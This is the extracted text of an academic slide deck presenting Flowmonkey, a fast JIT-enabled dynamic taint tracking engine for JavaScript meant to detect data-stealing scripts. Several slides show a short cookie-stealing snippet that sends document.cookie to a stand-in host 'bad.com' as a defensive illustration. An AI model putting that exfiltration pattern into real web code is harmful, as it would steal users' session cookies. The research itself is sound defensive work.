Flowmonkey: A Fast Dynamic Taint Tracking

Engine for JavaScript

Don Jang UC San Diego

document.cookie

Identity Theft✗ Cookie Stealing

Password

Credit card #

Browsing history

Epidemic of Data Stealing JavaScript!

How to Detect Data Stealing?

Without Sacrificing Performance?

MotivationDynamic Taint Tracking

FlowmonkeyFuture Work&Conclusion

Dynamic Taint Tracking

Tracks where a value goes at runtime

Dynamic Taint Tracking

1. Tag a value with a taint2. Propagate taints with the value3. Block taints from untrusted sinks

Example:Cookie Stealing

ck = document.cookie data = tmp + ck;

send(“bad.com”, data);

Example:Cookie Stealing

Inject Taints(At confidential sources)

ck = document.cookie data = tmp + ck;

send(“bad.com”, data );

document.cookie;

Example:Cookie Stealing

Propagate Taints(At assignments, etc)

ck = document.cookie; data = tmp + ck;

send(“bad.com”, data );

ck

ck;tmp +data

data

ck = document.cookie; data = tmp + ck;

send(“bad.com”, data );

Example:Cookie Stealing

Block Taints(At untrusted sinks)

“cr=” + color

send(“bad.com”, data );

Dynamic Taint Tracking:Policies

Cookie Protectioncookie send()

Password Protectionpassword send()

✗ ✗

General Policysecret info expression✗

Dynamic Taint Tracking:JSCross site scripting prevention with dynamic data

tainting and static analysis, NDSS'07

Analyzing information flow in JavaScript-based browser extensions, ACSAC'09

An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10

10~100x slowdown

Goal: Make It Fast

MotivationDynamic Taint Tracking

FlowmonkeyFuture Work&Conclusion

Interpreter JIT Engine

Source code

Based on Jaegermonkey

Modification M

Taint tracking logic is augmented

Language Extensions__taint(val, t)

val: a value to be taintedt : a taint to be used

Language Extensions__taintof(val)

returns the taint of val

Language Extensions var secret = __taint(34349, 1); tmp = secret * 68; tmp2 = tmp + “345”; tmp3 = parseInt(tmp2);

alert(__taintof(tmp)); // 1 is printed

Implementation: Shadow Stack

s * 6push s //s=5push 6mul

5

6

30

6’s taint

s’ taintJoined taint

Real Stack Shadow Stack

Implementation: Shadow Property

a.fld = secret

a

fld …

fld‘s taint …

Real Properties

Shadow Properties

Hybrid Approach

Full-fledged Taint Tracking

Interpreter

Taint DetectingJIT Engine

Hybrid Approach

Full-fledged Taint Tracking

Interpreter

Taint DetectingJIT Engine

If it doesn’t touch a taint

Hybrid Approach

Full-fledged Taint Tracking

Interpreter

Taint DetectingJIT Engine

Taint detected!!

Do full-fledgedtaint tracking

Hybrid Approach

Rapid prototypingFast with few taints

Slow with many taints

Performance: Baseline

Sunspidercookie doesn’t flow to 3rd party

code

Performance: Cookie Tracking

Sunspidercookie doesn’t flow to 3rd party

code

Demo

MotivationDynamic Taint Tracking

FlowmonkeyFuture Work&Conclusion

Future WorkMissing Flows

Implicit Flows, Timing Channel, etc

Empirical StudyTo prove the usability of taint tracking

ConclusionsA Fast Hybrid Taint Tracking EngineFirst JIT-enabled taint tracking engine

Still Many Missing PartsPossible to make it a protection tool?Can we sacrifice some performance?

Resourceshttp://firebird.ucsd.edu/flowmonkey

Thank you!